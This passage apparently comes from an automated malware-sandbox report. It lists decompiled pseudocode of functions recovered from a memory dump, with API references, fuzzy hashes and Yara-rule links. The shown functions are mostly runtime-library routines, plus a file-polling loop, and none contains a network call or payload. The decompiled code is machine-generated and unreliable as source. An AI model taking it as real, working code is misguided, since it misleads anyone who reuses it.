				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x7ab4d0; // 0x2d19f60
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E0077F348(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E007801F5(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E00787D4A(_t13);
									E007801F5(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}

0x0077d307
0x0077d30a
0x0077d312
0x0077d31b
0x0077d36a
0x0077d327
0x0077d32d
0x0077d331
0x0077d37b
0x0077d37b
0x0077d333
0x0077d33b
0x0077d33e
0x0077d341
0x0077d374
0x0077d375
0x00000000
0x0077d343
0x0077d349
0x0077d355
0x00000000
0x0077d357
0x0077d357
0x0077d358
0x0077d359
0x0077d35f
0x0077d364
0x0077d367
0x00000000
0x0077d367
0x0077d355
0x0077d341
0x0077d370
0x0077d373
0x00000000
0x0077d373
0x0077d36e
0x00000000
0x0077d314
0x0077d318
0x0077d318
0x00000000

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb929a9189007cd15df14c64e51c026c7cfbd3d1bb655651aeea4687864985d
Instruction ID: f4270c9b8d2af3c0fc51cd6f3a615a59a25e9196d8e4241844e275ee8620e72b
Opcode Fuzzy Hash: dbb929a9189007cd15df14c64e51c026c7cfbd3d1bb655651aeea4687864985d
Instruction Fuzzy Hash: 1F01A9B260AA16FEEB2126786CC5D2B672DEF923F83318725F539521D1DB3CCC014165

Uniqueness

Uniqueness Score: -1.00%

Function 00748BC0, Relevance: 6.1, APIs: 4, Instructions: 58
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00748BC0(void* __ecx, void* __edx) {
				void* __ebx;
				signed int _t8;
				int _t9;
				long _t14;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t30;

				_t22 = __edx;
				_t8 =  *0x7ac3f8; // 0x0
				_t9 = _t8 |  *0x7ac3fc;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x39)) = 0;
					do {
						_t9 = CreateFileW(E00741EEB(0x7ac3b0), 0x80000000, 7, 0, 3, 0x80, 0);
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x39)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x7ac3fc; // 0x0
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x7ac3f8)) {
								 *((char*)(_t24 + 0x39)) = 1;
								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
									E007495A9(0, _t24);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t23);
						}
					} while ( *((char*)(_t24 + 0x39)) == 1);
					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
						_t35 =  *0x7aa9d4 - 0x31;
						if( *0x7aa9d4 == 0x31) {
							E00747350(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
							return E00748742(_t24);
						}
					}
				}
				return _t9;
			}

0x00748bc0
0x00748bc0
0x00748bc5
0x00748bce
0x00748bd0
0x00748bd8
0x00748bdb
0x00748bf6
0x00748bfc
0x00748c01
0x00748c41
0x00748c03
0x00748c05
0x00748c0b
0x00748c11
0x00748c1d
0x00748c24
0x00748c28
0x00748c28
0x00748c32
0x00748c32
0x00748c39
0x00748c39
0x00748c44
0x00748c4d
0x00748c4f
0x00748c56
0x00748c61
0x00000000
0x00748c68
0x00748c56
0x00748c4d
0x00748c70

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00748C97), ref: 00748BF6
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00748C97), ref: 00748C05
Sleep.KERNEL32(00002710,?,?,?,00748C97), ref: 00748C32
CloseHandle.KERNEL32(00000000,?,?,?,00748C97), ref: 00748C39

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID:
API String ID: 1958988193-0
Opcode ID: febd11fae708b8660301c603dd1dc0a747325779f1029eecc7042f9b705d8264
Instruction ID: e5ecbe684a997b6c74ca9ff72620d96094484fb35988fe8371d1ce85a8792057
Opcode Fuzzy Hash: febd11fae708b8660301c603dd1dc0a747325779f1029eecc7042f9b705d8264
Instruction Fuzzy Hash: 3A117A302023447FDF72AB2498C8A2F7A9FEB82700F048849E28156182CB2D9841837B

Uniqueness

Uniqueness Score: -1.00%

Function 00782033, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00782033(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x7ab658 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x798b78 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x67a7e35f
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00782038
0x0078203c
0x00782043
0x00782047
0x00782055
0x0078206b
0x0078206f
0x00782098
0x0078209a
0x0078209e
0x007820a1
0x007820a1
0x007820a7
0x007820a9
0x00000000
0x007820aa
0x00782071
0x0078207a
0x00782089
0x0078207c
0x0078207f
0x00782085
0x00782085
0x0078208d
0x00000000
0x0078208f
0x00782092
0x00782094
0x00000000
0x00782094
0x0078208d
0x00782049
0x0078204e
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00781FDA,?,00000000,00000000,00000000,?,00782306,00000006,FlsSetValue), ref: 00782065
GetLastError.KERNEL32(?,00781FDA,?,00000000,00000000,00000000,?,00782306,00000006,FlsSetValue,00799068,00799070,00000000,00000364,?,00781DB4), ref: 00782071
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00781FDA,?,00000000,00000000,00000000,?,00782306,00000006,FlsSetValue,00799068,00799070,00000000), ref: 0078207F

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 2b1a33babfecbbed95a09519ef87f50056c9cf8269f3aee32629f6a47d32095f
Instruction ID: a4fbf24c8eff979eec8ede1a0a244a7a1e27e4a02a3558d71272734f24ed2288
Opcode Fuzzy Hash: 2b1a33babfecbbed95a09519ef87f50056c9cf8269f3aee32629f6a47d32095f
Instruction Fuzzy Hash: 00012B32781227ABC7315B79DC449677B98EF45B62B204621FA07D7252CB2CD803C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 007579DC, Relevance: 6.1, APIs: 4, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E007579DC(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					E00742459(0, _v8, _t22, _t25, 0);
					_v12 = 0;
					if(ReadFile(_t22, E00741F95(_v8), _t25,  &_v12, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t22);
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}

0x007579df
0x007579e0
0x007579e3
0x007579e5
0x007579ff
0x00757a04
0x00757a16
0x00757a1a
0x00757a28
0x00757a3b
0x00757a3d
0x00757a3d
0x00757a40
0x00757a46
0x00757a06
0x00757a06
0x00757a06
0x00757a4d

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9
GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 00757A0D
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 00757A32
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00744230,0079F464), ref: 00757A40

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: b0938465ca4da2a9a2d238b9d1c5ba8aecc497851a2f0e7005d8eee3f6f9b767
Instruction ID: 9fd9f00c6afca815f7570c262e9059e4866d97edff76c763416a54f18be7231b
Opcode Fuzzy Hash: b0938465ca4da2a9a2d238b9d1c5ba8aecc497851a2f0e7005d8eee3f6f9b767
Instruction Fuzzy Hash: DD01F4B0501108BFE7146B65ACC9EFF7B6CEB46365F10415AFD00A3280DB785F069670

Uniqueness

Uniqueness Score: -1.00%

Function 00771D01, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00771D01() {
				void* _t4;
				void* _t8;

				E00774F41();
				E00771C95();
				if(E00775195() != 0) {
					_t4 = E00775147(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E007751D1();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00771d01
0x00771d06
0x00771d12
0x00771d17
0x00771d1c
0x00771d1e
0x00771d29
0x00771d20
0x00771d20
0x00000000
0x00771d20
0x00771d14
0x00771d14
0x00771d16
0x00771d16

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00771D01
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00771D06
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00771D0B

Part of subcall function 00775195: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007751A6

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00771D20

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction ID: 2f1d40195d62f119ab4d10a99d8b5c65e49ab5c7af0f2bab26d9affd0eac02ec
Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction Fuzzy Hash: 14C04C18244A89D01C3037BC121F3BD03155CA33C6BE3D4C1A96D1B403AF4D080B6B72

Uniqueness

Uniqueness Score: -1.00%

Function 0077FFED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0078007D

Strings

pow, xrefs: 00780055, 00780072

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 9b9f3cf8fa5a0c10a6da0588d566c60d34f46d4dfaace587e65c5ade87758777
Instruction ID: 1aaae15a58e374b46bb70f676e0a206055070dcce0e7f33349cc9f32b77e0592
Opcode Fuzzy Hash: 9b9f3cf8fa5a0c10a6da0588d566c60d34f46d4dfaace587e65c5ade87758777
Instruction Fuzzy Hash: FC516D61A89205D6CB537B24CD1536E3B90EB40710F208D69F0D5822A9EB3D8C9D9BF7

Uniqueness

Uniqueness Score: -1.00%

Function 00787399, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00787399(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E00786F6C(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x7aa488)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x7aa488)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t7 =  &_v28; // 0x78723a
										_t51 = GetCPInfo(_t78, _t7);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x7aba28 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00786FDF(_t98);
												goto L37;
											}
										} else {
											E00771F00(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00786F2E( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00787044(_t78, _t91, _t95, _t98, _t98);
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00771F00(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x7aa498;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x7aa480; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00786F2E(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x7aa48c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E00786FDF(_t98);
				}
				L39:
				return E0076FD1B(_v8 ^ _t99);
			}

0x007873a1
0x007873a8
0x007873b0
0x007873b8
0x007873bd
0x007873ce
0x007873ce
0x007873d0
0x007873d2
0x007873d4
0x007873d7
0x007873d7
0x007873dd
0x00000000
0x00000000
0x007873e3
0x007873e4
0x007873e7
0x007873ea
0x007873ef
0x00000000
0x007873f1
0x007873f1
0x007873f7
0x007874c5
0x007873fd
0x007873fd
0x00787403
0x00000000
0x00787409
0x0078740d
0x00787413
0x00787415
0x00000000
0x0078741b
0x0078741b
0x00787420
0x00787426
0x00787428
0x007874b2
0x007874b8
0x00000000
0x007874ba
0x007874bb
0x00000000
0x007874bb
0x0078742e
0x00787438
0x0078743d
0x00787445
0x0078744b
0x0078744c
0x0078744f
0x007874a2
0x00787451
0x00787451
0x00787455
0x00787458
0x0078745a
0x0078745a
0x0078745d
0x0078745f
0x00000000
0x00000000
0x00787461
0x00787464
0x0078746f
0x0078746f
0x00787471
0x00000000
0x00000000
0x00787469
0x0078746e
0x0078746e
0x0078746e
0x00787473
0x00787476
0x00787479
0x00000000
0x00000000
0x00000000
0x00787479
0x0078745a
0x0078747b
0x0078747b
0x0078747e
0x00787483
0x00787483
0x00787486
0x00787487
0x00787487
0x00787487
0x00787497
0x0078749d
0x0078749d
0x007874a7
0x007874aa
0x007874ab
0x007874ac
0x00787570
0x00787571
0x00787576
0x00787577
0x00787577
0x00787428
0x00787415
0x00787403
0x007873f7
0x00000000
0x00787579
0x007874d7
0x007874df
0x007874df
0x007874e3
0x007874e6
0x007874ec
0x007874ef
0x007874ef
0x007874f2
0x007874f4
0x007874f6
0x007874f6
0x007874f9
0x007874fb
0x00000000
0x00000000
0x007874fd
0x00787500
0x0078751c
0x0078751c
0x0078751e
0x00000000
0x00000000
0x00787505
0x0078750b
0x0078750d
0x00787513
0x00787517
0x00787517
0x00787518
0x00000000
0x00787518
0x00000000
0x0078750b
0x00787520
0x00787523
0x00787526
0x00000000
0x00000000
0x00000000
0x00787526
0x00787528
0x00787528
0x0078752b
0x0078752c
0x0078752f
0x00787532
0x00787532
0x00787538
0x0078753b
0x0078754a
0x00787553
0x00787558
0x0078755e
0x0078755f
0x0078755f
0x00787562
0x00787565
0x00787568
0x0078756b
0x0078756b
0x0078756b
0x00000000
0x007873bf
0x007873c0
0x007873c6
0x0078757a
0x00787589

APIs

Part of subcall function 00786F6C: GetOEMCP.KERNEL32(00000000,?,?,007871F5,?), ref: 00786F97

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0078723A,?,00000000), ref: 0078740D
GetCPInfo.KERNEL32(00000000,:rx,?,?,?,0078723A,?,00000000), ref: 00787420

Strings

:rx, xrefs: 0078741B, 0078741E

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: :rx
API String ID: 546120528-2506775342
Opcode ID: bea2b102ed5cc60020b986cfd7eb4c1c887ac94f3912f3543f199fcc4b57d7a8
Instruction ID: 8ee780daff6e7e9e236fab8604ecc6411327c219825f08c6e0a16f961d8b6b42
Opcode Fuzzy Hash: bea2b102ed5cc60020b986cfd7eb4c1c887ac94f3912f3543f199fcc4b57d7a8
Instruction Fuzzy Hash: 515138709482859EDB28EF35C485ABBBFA5EF41310F34806EE49B8B251E73DD941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0077EE70, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0077EE70(void* __ebx, void* __ecx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				signed int _v12;
				void* _v20;
				signed int _t21;
				void* _t23;
				signed int _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t46;
				void* _t56;
				void* _t62;
				signed short* _t64;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t70;
				signed int _t71;
				void* _t72;
				intOrPtr* _t74;

				_t53 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t21 ^ _t71;
				_t64 = _a4;
				if(_t64 != 0) {
					_t23 = E0078175F(__ebx, __ecx, _t64, _a8);
					_pop(_t56);
					if(_t23 < _a8) {
						_t68 = 0;
						_t26 =  *((intOrPtr*)( *_a12 + 0xa8));
						if( *((intOrPtr*)( *_a12 + 0xa8)) == 0) {
							while( *_t64 != _t68) {
								_t27 =  *_t64 & 0x0000ffff;
								if(_t27 >= 0x41 && _t27 <= 0x5a) {
									 *_t64 = _t27 + 0x20;
								}
								_t64 =  &(_t64[1]);
							}
							L29:
							return E0076FD1B(_v8 ^ _t71);
						}
						_t31 = E0078AFBB(__ebx, _t56, _t26, 0x100, _t64, 0xffffffff, 0, 0);
						_t74 = _t72 + 0x18;
						_v12 = _t31;
						if(_t31 != 0) {
							if(_a8 >= _t31) {
								_t62 = _t31 + _t31;
								_t59 = _t62 + 8;
								asm("sbb eax, eax");
								if((_t62 + 0x00000008 & _t31) == 0) {
									L23:
									if(_t68 != 0) {
										if(E0078AFBB(_t53, _t59,  *((intOrPtr*)( *_a12 + 0xa8)), 0x100, _t64, 0xffffffff, _t68, _v12) == 0) {
											_t35 = E0077A504();
											_t66 = 0x2a;
											 *_t35 = _t66;
										} else {
											_t66 = E007815D4(_t64, _a8, _t68);
										}
										L28:
										E00770BA0(_t68);
										goto L29;
									}
									L24:
									 *((intOrPtr*)(E0077A504())) = 0xc;
									_t66 =  *((intOrPtr*)(E0077A504()));
									goto L28;
								}
								asm("sbb eax, eax");
								_t41 = _t31 & _t62 + 0x00000008;
								_t59 = _t62 + 8;
								if((_t31 & _t62 + 0x00000008) > 0x400) {
									asm("sbb eax, eax");
									_t68 = E0077F98C(_t59, _t41 & _t59);
									_pop(_t59);
									if(_t68 == 0) {
										goto L24;
									}
									 *_t68 = 0xdddd;
									L22:
									_t68 = _t68 + 8;
									goto L23;
								}
								asm("sbb eax, eax");
								E00790810();
								_t68 = _t74;
								if(_t68 == 0) {
									goto L24;
								}
								 *_t68 = 0xcccc;
								goto L22;
							}
							 *_t64 = 0;
							_t46 = E0077A504();
							_push(0x22);
							L2:
							_pop(_t70);
							 *_t46 = _t70;
							E0077695D();
							goto L29;
						}
						 *((intOrPtr*)(E0077A504())) = 0x2a;
						E0077A504();
						goto L29;
					}
					 *_t64 = 0;
				}
				_t46 = E0077A504();
				_push(0x16);
				goto L2;
			}

0x0077ee70
0x0077ee75
0x0077ee76
0x0077ee77
0x0077ee7e
0x0077ee83
0x0077ee88
0x0077eea4
0x0077eeaa
0x0077eeae
0x0077eeba
0x0077eebe
0x0077eec6
0x0077ef0f
0x0077eef9
0x0077eeff
0x0077ef09
0x0077ef09
0x0077ef0c
0x0077ef0c
0x0077efe6
0x0077eff8
0x0077eff8
0x0077eed3
0x0077eed8
0x0077eedb
0x0077eee0
0x0077ef1e
0x0077ef31
0x0077ef34
0x0077ef39
0x0077ef3d
0x0077ef87
0x0077ef89
0x0077efc0
0x0077efd3
0x0077efda
0x0077efdb
0x0077efc2
0x0077efcf
0x0077efcf
0x0077efdd
0x0077efde
0x00000000
0x0077efe4
0x0077ef8b
0x0077ef90
0x0077ef9b
0x00000000
0x0077ef9b
0x0077ef44
0x0077ef46
0x0077ef48
0x0077ef50
0x0077ef6d
0x0077ef77
0x0077ef79
0x0077ef7c
0x00000000
0x00000000
0x0077ef7e
0x0077ef84
0x0077ef84
0x00000000
0x0077ef84
0x0077ef54
0x0077ef58
0x0077ef5d
0x0077ef61
0x00000000
0x00000000
0x0077ef63
0x00000000
0x0077ef63
0x0077ef22
0x0077ef25
0x0077ef2a
0x0077ee91
0x0077ee91
0x0077ee92
0x0077ee94
0x00000000
0x0077ee99
0x0077eee7
0x0077eeed
0x00000000
0x0077eef2
0x0077eeb2
0x0077eeb2
0x0077ee8a
0x0077ee8f
0x00000000

APIs

__alloca_probe_16.LIBCMT ref: 0077EF58
__freea.LIBCMT ref: 0077EFDE

Strings

:nu, xrefs: 0077EE72

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: :nu
API String ID: 1635606685-229407438
Opcode ID: 37b615a3918c9733b58bc373e5c0ca622a339e60a0ae7bfae952679aab7aec4c
Instruction ID: 5a5f4c98be2c4b31ebba25e85687eb0ab7eaae5df10ddf6aeda10ab467cbe3dc
Opcode Fuzzy Hash: 37b615a3918c9733b58bc373e5c0ca622a339e60a0ae7bfae952679aab7aec4c
Instruction Fuzzy Hash: E441E471A00211EBEF21AF64CC45A6E77A4EF497A0B25C5B9F80CDB281EB3CD9508791

Uniqueness

Uniqueness Score: -1.00%

Function 00787044, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00787044(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t63 ^ _t102;
				_t2 =  &_a4; // 0x787576
				_t101 =  *_t2;
				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
					_t96 = _t101 + 0x119;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t96 = _t101 + 0x119;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
